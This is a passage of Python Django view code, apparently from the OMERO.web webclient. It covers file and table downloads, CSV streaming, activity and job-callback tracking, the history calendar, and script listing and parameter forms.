"Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
context["template"] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
    """
    Serve the specified OriginalFile's contents as an HTTP response.

    Streams the file in chunks so text or png/jpeg etc. files can be shown
    in the browser, or downloaded when ``download`` is True.
    """
    # May be viewing results of a script run in a different group;
    # group -1 queries across all of the user's groups.
    conn.SERVICE_OPTS.setOmeroGroup(-1)
    file_obj = conn.getObject("OriginalFile", fileId)
    if file_obj is None:
        return handlerInternalError(
            request, "Original File does not exist (id:%s)." % (fileId)
        )
    response = ConnCleaningHttpResponse(
        file_obj.getFileInChunks(buf=settings.CHUNK_SIZE)
    )
    # Connection is cleaned up by the response once streaming finishes.
    response.conn = conn
    content_type = file_obj.mimetype
    if content_type == "text/x-python":
        # allows display in browser
        content_type = "text/plain"
    response["Content-Type"] = content_type
    response["Content-Length"] = file_obj.getSize()
    if download:
        attachment_name = file_obj.name.replace(" ", "_").replace(",", ".")
        response["Content-Disposition"] = "attachment; filename=%s" % attachment_name
    return response
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
    """
    Download OMERO.table as CSV (streaming response) or return as HTML or json.

    Request parameters:
        header: 'false' excludes the column names row if mtype is 'csv'
        offset: table rows offset for pagination
        limit: table rows limit for pagination
        query: OMERO.table query for filtering rows

    @param file_id: OriginalFile ID
    @param mtype: None for html table or 'csv' or 'json'
    @param conn: BlitzGateway connection
    """
    query = request.GET.get("query", "*")
    offset = get_long_or_default(request, "offset", 0)
    limit = get_long_or_default(request, "limit", settings.PAGE)
    # iviewer link is optional - only present if the iviewer app is installed
    iviewer_url = None
    try:
        iviewer_url = reverse("omero_iviewer_index")
    except NoReverseMatch:
        pass
    # Check if file exists since _table_query() doesn't check
    file_id = long(file_id)
    orig_file = conn.getObject("OriginalFile", file_id)
    if orig_file is None:
        raise Http404("OriginalFile %s not found" % file_id)
    # only stream rows lazily for CSV download; html/json load a page of rows
    lazy = mtype == "csv"
    context = webgateway_views._table_query(
        request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
    )
    if context.get("error") or not context.get("data"):
        return JsonResponse(context)
    # OR, return as csv or html
    if mtype == "csv":
        table_data = context.get("data")
        hide_header = request.GET.get("header") == "false"
        def csv_gen():
            # Generator yielding the CSV text in chunks: header row first
            # (unless suppressed), then one chunk per batch of lazy rows.
            if not hide_header:
                csv_cols = ",".join(table_data.get("columns"))
                yield csv_cols
            for rows in table_data.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
                )
        downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
        downloadName = downloadName + ".csv"
        # TableClosingHttpResponse closes the OMERO.table when streaming ends
        rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
        rsp.conn = conn
        rsp.table = context.get("table")
        rsp["Content-Type"] = "application/force-download"
        # rsp['Content-Length'] = ann.getFileSize()
        rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
        return rsp
    context["data"]["name"] = orig_file.name
    context["data"]["path"] = orig_file.path
    context["data"]["id"] = file_id
    context["meta"]["query"] = query
    # check if offset matches an integer page number:
    if offset == 0 or offset / limit == offset // limit:
        context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
    # pagination links
    url = reverse("omero_table", args=[file_id])
    context["meta"]["url"] = url
    url += "?limit=%s" % limit
    if query != "*":
        url += "&query=%s" % query
    if (offset + limit) < context["meta"]["totalCount"]:
        context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
    if offset > 0:
        context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
    # by default, return context as JSON data
    if mtype is None:
        context["template"] = "webclient/annotations/omero_table.html"
        context["iviewer_url"] = iviewer_url
        # record the index of special column types so the template can link
        # Image/Well/Roi cells to the relevant viewers
        col_types = context["data"]["column_types"]
        if "ImageColumn" in col_types:
            context["image_column_index"] = col_types.index("ImageColumn")
        if "WellColumn" in col_types:
            context["well_column_index"] = col_types.index("WellColumn")
        if "RoiColumn" in col_types:
            context["roi_column_index"] = col_types.index("RoiColumn")
        # we don't use ShapeColumn type - just check name and LongColumn type...
        # TODO: when ShapeColumn is supported, add handling to this code
        cnames = [n.lower() for n in context["data"]["columns"]]
        if "shape" in cnames and col_types[cnames.index("shape")] == "LongColumn":
            context["shape_column_index"] = cnames.index("shape")
        # provide example queries - pick first DoubleColumn...
        for idx, c_type in enumerate(col_types):
            if c_type in ("DoubleColumn", "LongColumn"):
                col_name = context["data"]["columns"][idx]
                # find first few non-empty cells...
                vals = []
                for row in context["data"]["rows"]:
                    if row[idx]:
                        vals.append(row[idx])
                        if len(vals) > 3:
                            break
                if " " in col_name or len(vals) < 2:
                    # Don't support queries on columns with spaces
                    continue
                context["example_column"] = col_name
                context["example_min_value"] = min(vals)
                context["example_max_value"] = max(vals)
                break
    return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
    """Serve a FileAnnotation's file as an http attachment for download."""
    annotation = conn.getObject("FileAnnotation", annId)
    if annotation is None:
        return handlerInternalError(
            request, "FileAnnotation does not exist (id:%s)." % (annId)
        )
    # Stream in chunks; the response cleans up the connection when done.
    response = ConnCleaningHttpResponse(
        annotation.getFileInChunks(buf=settings.CHUNK_SIZE)
    )
    response.conn = conn
    response["Content-Type"] = "application/force-download"
    response["Content-Length"] = annotation.getFileSize()
    attachment_name = annotation.getFileName().replace(" ", "_")
    response["Content-Disposition"] = "attachment; filename=%s" % (attachment_name)
    return response
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
    """Downloads the 'Original Metadata' of an Image as a text file."""
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    om = image.loadOriginalMetadata()
    # om[1] is global metadata, om[2] is series metadata (key/value pairs)
    lines = ["[Global Metadata]"]
    lines += ["%s=%s" % (pair[0], pair[1]) for pair in om[1]]
    lines.append("[Series Metadata]")
    lines += ["%s=%s" % (pair[0], pair[1]) for pair in om[2]]
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
    """
    Page displays a simple "Preparing download..." message and redirects to
    the 'url'.
    We construct the url and query string from request: 'url' and 'ids'.
    """
    # 'format' present -> export as e.g. JPEG/PNG; absent -> original files
    format = request.GET.get("format", None)
    if format is not None:
        download_url = reverse("download_as")
        zipName = "Export_as_%s" % format
    else:
        download_url = reverse("archived_files")
        zipName = "OriginalFileDownload"
    targetIds = request.GET.get("ids")  # E.g. image-1|image-2
    defaultName = request.GET.get("name", zipName)  # default zip name
    defaultName = os.path.basename(defaultName)  # remove path
    if targetIds is None:
        raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
    ids = targetIds.split("|")
    fileLists = []
    fileCount = 0
    filesTotalSize = 0
    # If we're downloading originals, list original files so user can
    # download individual files.
    if format is None:
        imgIds = []
        wellIds = []
        for i in ids:
            if i.split("-")[0] == "image":
                imgIds.append(i.split("-")[1])
            elif i.split("-")[0] == "well":
                wellIds.append(i.split("-")[1])
        images = []
        # Get images...
        if imgIds:
            images = list(conn.getObjects("Image", imgIds))
        if len(images) == 0:
            raise Http404("No images found.")
        # Have a list of files per fileset (or per image without fileset)
        fsIds = set()
        fileIds = set()
        for image in images:
            fs = image.getFileset()
            if fs is not None:
                # Make sure we've not processed this fileset before.
                if fs.id in fsIds:
                    continue
                fsIds.add(fs.id)
            files = list(image.getImportedImageFiles())
            fList = []
            for f in files:
                # de-duplicate files shared between images
                if f.id in fileIds:
                    continue
                fileIds.add(f.id)
                fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
                filesTotalSize += f.getSize()
            if len(fList) > 0:
                fileLists.append(fList)
        fileCount = sum([len(fList) for fList in fileLists])
    else:
        # E.g. JPEG/PNG - 1 file per image
        fileCount = len(ids)
    # Build query string, e.g. "image-1|well-2" -> "image=1&well=2"
    query = "&".join([_id.replace("-", "=") for _id in ids])
    download_url = download_url + "?" + query
    if format is not None:
        download_url = download_url + "&format=%s" % format
    context = {
        "template": "webclient/annotations/download_placeholder.html",
        "url": download_url,
        "defaultName": defaultName,
        "fileLists": fileLists,
        "fileCount": fileCount,
        "filesTotalSize": filesTotalSize,
    }
    # refuse over-sized zips up-front so the user isn't left waiting
    if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
    """
    Loads the calendar displayed in the left panel of the history page.

    Shows the current month by default; filtered by experimenter.
    """
    eid = request.session.get("user_id")
    # Fall back to the current month when no date is given.
    if year is None or month is None:
        today = datetime.datetime.today()
        year, month = today.year, today.month
    controller = BaseCalendar(conn=conn, year=year, month=month, eid=eid)
    controller.create_calendar()
    return {
        "controller": controller,
        "template": "webclient/history/calendar.html",
    }
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
    """Load the data for a particular date into the center panel."""
    if None in (year, month, day):
        raise Http404("Year, month, and day are required")
    page = int(request.GET.get("page", 1))
    eid = request.session.get("user_id")
    controller = BaseCalendar(
        conn=conn, year=year, month=month, day=day, eid=eid
    )
    controller.get_items(page)
    return {
        "controller": controller,
        "template": "webclient/history/history_details.html",
    }
def getObjectUrl(conn, obj):
    """
    Build a webclient URL for browsing to the given omero.model.ObjectI
    P/D/I, S/P etc.; used to display results from the scripting service.
    E.g webclient/userdata/?path=image-12601
    For a FileAnnotation, try to browse to a parent P/D/I instead.
    """
    url = reverse(viewname="load_template", args=["userdata"])
    # if we have a File Annotation, then we want our URL to be for the parent
    # object...
    if isinstance(obj, omero.model.FileAnnotationI):
        ann = conn.getObject("Annotation", obj.id.val)
        for parent_type in ("project", "dataset", "image"):
            parent_links = list(ann.getParentLinks(parent_type))
            if parent_links:
                obj = parent_links[0].parent
                break
    browsable = (
        "ImageI",
        "DatasetI",
        "ProjectI",
        "ScreenI",
        "PlateI",
        "WellI",
    )
    kls = obj.__class__.__name__
    if kls in browsable:
        # e.g. "ImageI" -> "?show=image-123"
        url += "?show=%s-%s" % (kls[:-1].lower(), obj.id.val)
    return url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
    """Merge the given key/value pairs into one callback entry in session."""
    request.session["callback"][cbString].update(kwargs)
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
    """
    This refreshes callback handles (delete, scripts, chgrp etc) and provides
    html to update Activities window & Progressbar.
    The returned html contains details for ALL callbacks in web session,
    regardless of their status.
    We also add counts of jobs, failures and 'in progress' to update status
    bar.
    """
    in_progress = 0
    failure = 0
    new_results = []
    _purgeCallback(request)
    # If we have a jobId (not added to request.session) just process it...
    # ONLY used for chgrp/chown dry-run.
    jobId = request.GET.get("jobId", None)
    if jobId is not None:
        jobId = str(jobId)
        try:
            prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
            status = prx.getStatus()
            logger.debug("job status: %s", status)
            rsp = prx.getResponse()
            # response present -> the dry-run has finished
            if rsp is not None:
                rv = graphResponseMarshal(conn, rsp)
                rv["finished"] = True
            else:
                rv = {"finished": False}
            rv["status"] = {
                "currentStep": status.currentStep,
                "steps": status.steps,
                "startTime": status.startTime,
                "stopTime": status.stopTime,
            }
        except IceException:
            # handle no longer exists server-side - treat as finished
            rv = {"finished": True}
        return rv
    elif request.method == "DELETE":
        # DELETE cancels a running job identified by 'jobId' in the body
        try:
            json_data = json.loads(request.body)
        except TypeError:
            # for Python 3.5
            json_data = json.loads(bytes_to_native_str(request.body))
        jobId = json_data.get("jobId", None)
        if jobId is not None:
            jobId = str(jobId)
            rv = {"jobId": jobId}
            try:
                prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
                status = prx.getStatus()
                logger.debug("pre-cancel() job status: %s", status)
                rv["status"] = {
                    "currentStep": status.currentStep,
                    "steps": status.steps,
                    "startTime": status.startTime,
                    "stopTime": status.stopTime,
                }
                prx.cancel()
            except omero.LockTimeout:
                # expected that it will take > 5 seconds to cancel
                logger.info("Timeout on prx.cancel()")
            return rv
    # test each callback for failure, errors, completion, results etc
    for cbString in request.session.get("callback").keys():
        callbackDict = request.session["callback"][cbString]
        job_type = callbackDict["job_type"]
        status = callbackDict["status"]
        if status == "failed":
            failure += 1
        request.session.modified = True
        # update chgrp / chown
        if job_type in ("chgrp", "chown"):
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    rsp = prx.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error(
                                    "%s failed with: %s" % (job_type, rsp_params)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report="%s %s" % (rsp.name, rsp_params),
                                    error=1,
                                )
                            elif isinstance(rsp, omero.cmd.OK):
                                update_callback(request, cbString, status="finished")
                        else:
                            in_progress += 1
                    finally:
                        prx.close(close_handle)
                except Exception:
                    logger.info(
                        "Activities %s handle not found: %s" % (job_type, cbString)
                    )
                    continue
        elif job_type == "send_email":
            if status not in ("failed", "finished"):
                rsp = None
                try:
                    prx = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    callback = omero.callbacks.CmdCallbackI(
                        conn.c, prx, foreground_poll=True
                    )
                    rsp = callback.getResponse()
                    close_handle = False
                    try:
                        # if response is None, then we're still in progress,
                        # otherwise...
                        if rsp is not None:
                            close_handle = True
                            new_results.append(cbString)
                            if isinstance(rsp, omero.cmd.ERR):
                                rsp_params = ", ".join(
                                    [
                                        "%s: %s" % (k, v)
                                        for k, v in rsp.parameters.items()
                                    ]
                                )
                                logger.error("send_email failed with: %s" % rsp_params)
                                update_callback(
                                    request,
                                    cbString,
                                    status="failed",
                                    report={"error": rsp_params},
                                    error=1,
                                )
                            else:
                                # success count + invalid users/emails totals
                                total = (
                                    rsp.success
                                    + len(rsp.invalidusers)
                                    + len(rsp.invalidemails)
                                )
                                update_callback(
                                    request,
                                    cbString,
                                    status="finished",
                                    rsp={"success": rsp.success, "total": total},
                                )
                                if (
                                    len(rsp.invalidusers) > 0
                                    or len(rsp.invalidemails) > 0
                                ):
                                    invalidusers = [
                                        e.getFullName()
                                        for e in list(
                                            conn.getObjects(
                                                "Experimenter", rsp.invalidusers
                                            )
                                        )
                                    ]
                                    update_callback(
                                        request,
                                        cbString,
                                        report={
                                            "invalidusers": invalidusers,
                                            "invalidemails": rsp.invalidemails,
                                        },
                                    )
                        else:
                            in_progress += 1
                    finally:
                        callback.close(close_handle)
                except Exception:
                    logger.error(traceback.format_exc())
                    logger.info("Activities send_email handle not found: %s" % cbString)
        # update delete
        elif job_type == "delete":
            if status not in ("failed", "finished"):
                try:
                    handle = omero.cmd.HandlePrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                    cb = omero.callbacks.CmdCallbackI(
                        conn.c, handle, foreground_poll=True
                    )
                    rsp = cb.getResponse()
                    close_handle = False
                    try:
                        if not rsp:  # Response not available
                            update_callback(
                                request,
                                cbString,
                                error=0,
                                status="in progress",
                                dreport=_formatReport(handle),
                            )
                            in_progress += 1
                        else:  # Response available
                            close_handle = True
                            new_results.append(cbString)
                            rsp = cb.getResponse()
                            err = isinstance(rsp, omero.cmd.ERR)
                            if err:
                                update_callback(
                                    request,
                                    cbString,
                                    error=1,
                                    status="failed",
                                    dreport=_formatReport(handle),
                                )
                                failure += 1
                            else:
                                update_callback(
                                    request,
                                    cbString,
                                    error=0,
                                    status="finished",
                                    dreport=_formatReport(handle),
                                )
                    finally:
                        cb.close(close_handle)
                except Ice.ObjectNotExistException:
                    # handle already gone - assume the delete completed
                    update_callback(
                        request, cbString, error=0, status="finished", dreport=None
                    )
                except Exception as x:
                    logger.error(traceback.format_exc())
                    logger.error("Status job '%s'error:" % cbString)
                    update_callback(
                        request, cbString, error=1, status="failed", dreport=str(x)
                    )
                    failure += 1
        # update scripts
        elif job_type == "script":
            # if error on runScript, the cbString is not a ProcessCallback...
            if not cbString.startswith("ProcessCallback"):
                continue  # ignore
            if status not in ("failed", "finished"):
                logger.info("Check callback on script: %s" % cbString)
                try:
                    proc = omero.grid.ScriptProcessPrx.checkedCast(
                        conn.c.ic.stringToProxy(cbString)
                    )
                except IceException:
                    update_callback(
                        request,
                        cbString,
                        status="failed",
                        Message="No process found for job",
                        error=1,
                    )
                    continue
                cb = omero.scripts.ProcessCallbackI(conn.c, proc)
                # check if we get something back from the handle...
                if cb.block(0):  # ms.
                    cb.close()
                    try:
                        # we can only retrieve this ONCE - must save results
                        results = proc.getResults(0, conn.SERVICE_OPTS)
                        update_callback(request, cbString, status="finished")
                        new_results.append(cbString)
                    except Exception:
                        update_callback(
                            request,
                            cbString,
                            status="finished",
                            Message="Failed to get results",
                        )
                        logger.info("Failed on proc.getResults() for OMERO.script")
                        continue
                    # value could be rstring, rlong, robject
                    rMap = {}
                    for key, value in results.items():
                        v = value.getValue()
                        if key in ("stdout", "stderr", "Message"):
                            if key in ("stderr", "stdout"):
                                # just save the id of original file
                                v = v.id.val
                            update_kwargs = {key: v}
                            update_callback(request, cbString, **update_kwargs)
                        else:
                            if hasattr(v, "id"):
                                # do we have an object (ImageI,
                                # FileAnnotationI etc)
                                obj_data = {
                                    "id": v.id.val,
                                    "type": v.__class__.__name__[:-1],
                                }
                                obj_data["browse_url"] = getObjectUrl(conn, v)
                                if v.isLoaded() and hasattr(v, "file"):
                                    # try:
                                    mimetypes = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if v.file.mimetype.val in mimetypes:
                                        obj_data["fileType"] = mimetypes[
                                            v.file.mimetype.val
                                        ]
                                        obj_data["fileId"] = v.file.id.val
                                    obj_data["name"] = v.file.name.val
                                    # except Exception:
                                    #     pass
                                if v.isLoaded() and hasattr(v, "name"):
                                    # E.g Image, OriginalFile etc
                                    name = unwrap(v.name)
                                    if name is not None:
                                        # E.g. FileAnnotation has null name
                                        obj_data["name"] = name
                                rMap[key] = obj_data
                            else:
                                rMap[key] = unwrap(v)
                    update_callback(request, cbString, results=rMap)
                else:
                    in_progress += 1
    # having updated the request.session, we can now prepare the data for http
    # response
    rv = {}
    for cbString in request.session.get("callback").keys():
        # make a copy of the map in session, so that we can replace non
        # json-compatible objects, without modifying session
        rv[cbString] = copy.copy(request.session["callback"][cbString])
    # return json (used for testing)
    if "template" in kwargs and kwargs["template"] == "json":
        for cbString in request.session.get("callback").keys():
            rv[cbString]["start_time"] = str(
                request.session["callback"][cbString]["start_time"]
            )
        rv["inprogress"] = in_progress
        rv["failure"] = failure
        rv["jobs"] = len(request.session["callback"])
        return JsonResponse(rv)  # json
    jobs = []
    new_errors = False
    for key, data in rv.items():
        # E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
        # create id we can use as html id,
        # E.g. 39f77932-c447-40d8-8f99-910b5a531a25
        if len(key.split(" ")) > 0:
            htmlId = key.split(" ")[0]
            if len(htmlId.split("/")) > 1:
                htmlId = htmlId.split("/")[1]
        rv[key]["id"] = htmlId
        rv[key]["key"] = key
        if key in new_results:
            rv[key]["new"] = True
        if "error" in data and data["error"] > 0:
            new_errors = True
        jobs.append(rv[key])
    # newest jobs first
    jobs.sort(key=lambda x: x["start_time"], reverse=True)
    context = {
        "sizeOfJobs": len(request.session["callback"]),
        "jobs": jobs,
        "inprogress": in_progress,
        "new_results": len(new_results),
        "new_errors": new_errors,
        "failure": failure,
    }
    context["template"] = "webclient/activities/activitiesContent.html"
    return context
@login_required()
def activities_update(request, action, **kwargs):
    """
    When 'action' == 'clean', clear jobs from request.session['callback']:
    either a single job (if 'jobKey' is specified in POST) or all jobs apart
    from those still in progress.
    """
    request.session.modified = True
    if action == "clean":
        callbacks = request.session["callback"]
        if "jobKey" in request.POST:
            # Remove just the one job, reporting whether it was found.
            job_id = request.POST.get("jobKey")
            removed = job_id in callbacks
            if removed:
                del callbacks[job_id]
                request.session.modified = True
            return JsonResponse({"removed": removed})
        # No jobKey: clear out every job that has already completed.
        for key, data in list(callbacks.items()):
            if data["status"] != "in progress":
                del callbacks[key]
        return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
    """Serve the experimenter's photo as a JPEG image."""
    photo = conn.getExperimenterPhoto(oid)
    response = HttpResponse(photo, content_type="image/jpeg")
    return response
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
    """
    Delegates to webgateway's full image viewer, using the share connection
    if a share_id is given.

    @param iid: Image ID to view
    @param share_id: optional share ID; when present, viewer URLs are
        prefixed with it so requests go through the share connection
    """
    # The original used the fragile `cond and a or b` idiom; an explicit
    # conditional is equivalent here and cannot mis-select a falsy value.
    if share_id is not None:
        viewport_server = reverse("webindex") + share_id
    else:
        viewport_server = reverse("webindex")
    # remove any trailing slash
    kwargs["viewport_server"] = viewport_server.rstrip("/")
    return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
    """
    List the available scripts - just official scripts for now.
    If all scripts are under a single top-level directory, this is
    removed by default. To prevent this, use ?full_path=true
    """
    scriptService = conn.getScriptService()
    scripts = scriptService.getScripts()
    # group scripts into 'folders' (path), named by parent folder name
    scriptMenu = {}
    # comma-separated list of full paths to hide, from server settings
    scripts_to_ignore = (
        request.session.get("server_settings", {})
        .get("scripts_to_ignore", "")
        .split(",")
    )
    for s in scripts:
        scriptId = s.id.val
        path = s.path.val
        name = s.name.val
        fullpath = os.path.join(path, name)
        if fullpath in scripts_to_ignore:
            logger.info("Ignoring script %r" % fullpath)
            continue
        # We want to build a hierarchical <ul> <li> structure
        # Each <ul> is a {}, each <li> is either a script 'name': <id> or
        # directory 'name': {ul}
        ul = scriptMenu
        dirs = fullpath.split(os.path.sep)
        for li, d in enumerate(dirs):
            if len(d) == 0:
                continue
            if d not in ul:
                # if last component in path:
                if li + 1 == len(dirs):
                    ul[d] = scriptId
                else:
                    ul[d] = {}
            ul = ul[d]
    # convert <ul> maps into lists and sort
    def ul_to_list(ul):
        # Recursively turn the nested dicts into sorted lists of
        # {'name': ..., 'id': ...} / {'name': ..., 'ul': [...]} entries.
        dir_list = []
        for name, value in ul.items():
            if isinstance(value, dict):
                # value is a directory
                dir_list.append({"name": name, "ul": ul_to_list(value)})
            else:
                dir_list.append({"name": name, "id": value})
        dir_list.sort(key=lambda x: x["name"].lower())
        return dir_list
    scriptList = ul_to_list(scriptMenu)
    # If we have a single top-level directory, we can skip it
    if not request.GET.get("full_path") and len(scriptList) == 1:
        scriptList = scriptList[0]["ul"]
    return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
    """
    Generates an html form for the parameters of a defined script.

    Builds 'paramData' describing the script (name, description, authors,
    version etc.) and a sorted list of its inputs. Inputs are grouped into
    parent/child rows using the script 'grouping' convention (e.g. "03" is
    the parent of "03.1"). Request parameters can pre-populate defaults,
    e.g. ?Image=1,2 fills Data_Type and IDs.
    """
    scriptService = conn.getScriptService()
    try:
        params = scriptService.getParams(long(scriptId))
    except Exception as ex:
        # 'message' attr is py2-only; fall back to args on python 3
        # (previously ex.message raised AttributeError on py3, masking
        # the real error)
        message = getattr(ex, "message", None)
        if message is None:
            message = str(ex.args[0]) if ex.args else ""
        if message.lower().startswith("no processor available"):
            return {
                "template": "webclient/scripts/no_processor.html",
                "scriptId": scriptId,
            }
        # bare raise preserves the original traceback (was 'raise ex')
        raise
    if params is None:
        return HttpResponse()
    paramData = {}
    paramData["id"] = long(scriptId)
    paramData["name"] = params.name.replace("_", " ")
    paramData["description"] = params.description
    paramData["authors"] = ", ".join([a for a in params.authors])
    paramData["contact"] = params.contact
    paramData["version"] = params.version
    paramData["institutions"] = ", ".join([i for i in params.institutions])
    inputs = []  # use a list so we can sort by 'grouping'
    Data_TypeParam = None
    IDsParam = None
    for key, param in params.inputs.items():
        i = {}
        i["name"] = key.replace("_", " ")
        i["key"] = key
        if not param.optional:
            i["required"] = True
        i["description"] = param.description
        if param.min:
            i["min"] = str(param.min.getValue())
        if param.max:
            i["max"] = str(param.max.getValue())
        if param.values:
            i["options"] = [v.getValue() for v in param.values.getValue()]
        if param.useDefault:
            i["default"] = unwrap(param.prototype)
            if isinstance(i["default"], omero.model.IObject):
                i["default"] = None
        pt = unwrap(param.prototype)
        if pt.__class__.__name__ == "dict":
            i["map"] = True
        elif pt.__class__.__name__ == "list":
            i["list"] = True
            if "default" in i:
                i["default"] = ",".join([str(d) for d in i["default"]])
        elif isinstance(pt, bool):
            i["boolean"] = True
        elif isinstance(pt, int) or isinstance(pt, long):
            # will stop the user entering anything other than numbers.
            i["number"] = "number"
        elif isinstance(pt, float):
            i["number"] = "float"
        # if we got a value for this key in the page request, use this as
        # default
        if request.GET.get(key, None) is not None:
            i["default"] = request.GET.get(key, None)
        # E.g "" (string) or [0] (int list) or 0.0 (float)
        i["prototype"] = unwrap(param.prototype)
        i["grouping"] = param.grouping
        inputs.append(i)
        if key == "IDs":
            IDsParam = i  # remember these...
        if key == "Data_Type":
            Data_TypeParam = i
    inputs.sort(key=lambda i: i["grouping"])
    # if we have Data_Type param - use the request parameters to populate IDs
    if (
        Data_TypeParam is not None
        and IDsParam is not None
        and "options" in Data_TypeParam
    ):
        IDsParam["default"] = ""
        for dtype in Data_TypeParam["options"]:
            if request.GET.get(dtype, None) is not None:
                Data_TypeParam["default"] = dtype
                IDsParam["default"] = request.GET.get(dtype, "")
                break  # only use the first match
        # if we've not found a match, check whether we have "Well" selected
        if len(IDsParam["default"]) == 0 and request.GET.get("Well", None) is not None:
            if "Image" in Data_TypeParam["options"]:
                wellIds = [long(j) for j in request.GET.get("Well", None).split(",")]
                wellIdx = 0
                try:
                    wellIdx = int(request.GET.get("Index", 0))
                except Exception:
                    pass
                wells = conn.getObjects("Well", wellIds)
                imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
                Data_TypeParam["default"] = "Image"
                IDsParam["default"] = ",".join(imgIds)
    # try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
    # level now (not recursive!)
    for i in range(len(inputs)):
        if len(inputs) <= i:
            # we may remove items from inputs as we go - need to check
            break
        param = inputs[i]
        grouping = param["grouping"]  # E.g 03
        param["children"] = list()
        while len(inputs) > i + 1:
            nextGrp = inputs[i + 1]["grouping"]  # E.g. 03.1
            if nextGrp.split(".")[0] == grouping:
                param["children"].append(inputs[i + 1])
                inputs.pop(i + 1)
            else:
                break
    paramData["inputs"] = inputs
    return {
        "template": "webclient/scripts/script_ui.html",
        "paramData": paramData,
        "scriptId": scriptId,
    }
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
    """
    Show a UI for running figure scripts

    Handled scriptName values (see branches below): 'SplitView',
    'Thumbnail', 'MakeMovie'. Objects are specified in the request,
    e.g. ?Image=1,2 or ?Dataset=1,2 or ?Well=1,2.
    NOTE(review): an unrecognised scriptName leaves scriptPath/template
    unbound and raises - confirm URLs only route the three names above.
    """
    imageIds = request.GET.get("Image", None)  # comma - delimited list
    datasetIds = request.GET.get("Dataset", None)
    wellIds = request.GET.get("Well", None)
    if wellIds is not None:
        # convert Well IDs into the contained Image IDs (field ?Index=i)
        wellIds = [long(i) for i in wellIds.split(",")]
        wells = conn.getObjects("Well", wellIds)
        wellIdx = getIntOrDefault(request, "Index", 0)
        imageIds = [str(w.getImage(wellIdx).getId()) for w in wells]
        imageIds = ",".join(imageIds)
    if imageIds is None and datasetIds is None:
        return HttpResponse(
            "Need to specify /?Image=1,2 or /?Dataset=1,2 or /?Well=1,2"
        )
    def validateIds(dtype, ids):
        """Filter ids to those that exist; set group context; 404 if none."""
        ints = [int(oid) for oid in ids.split(",")]
        validObjs = {}
        for obj in conn.getObjects(dtype, ints):
            validObjs[obj.id] = obj
        filteredIds = [iid for iid in ints if iid in validObjs.keys()]
        if len(filteredIds) == 0:
            raise Http404("No %ss found with IDs %s" % (dtype, ids))
        else:
            # Now we can specify group context - All should be same group
            gid = list(validObjs.values())[0].getDetails().group.id.val
            conn.SERVICE_OPTS.setOmeroGroup(gid)
        return filteredIds, validObjs
    context = {}
    if imageIds is not None:
        imageIds, validImages = validateIds("Image", imageIds)
        context["idString"] = ",".join([str(i) for i in imageIds])
        context["dtype"] = "Image"
    if datasetIds is not None:
        datasetIds, validDatasets = validateIds("Dataset", datasetIds)
        context["idString"] = ",".join([str(i) for i in datasetIds])
        context["dtype"] = "Dataset"
    if scriptName == "SplitView":
        scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
        template = "webclient/scripts/split_view_figure.html"
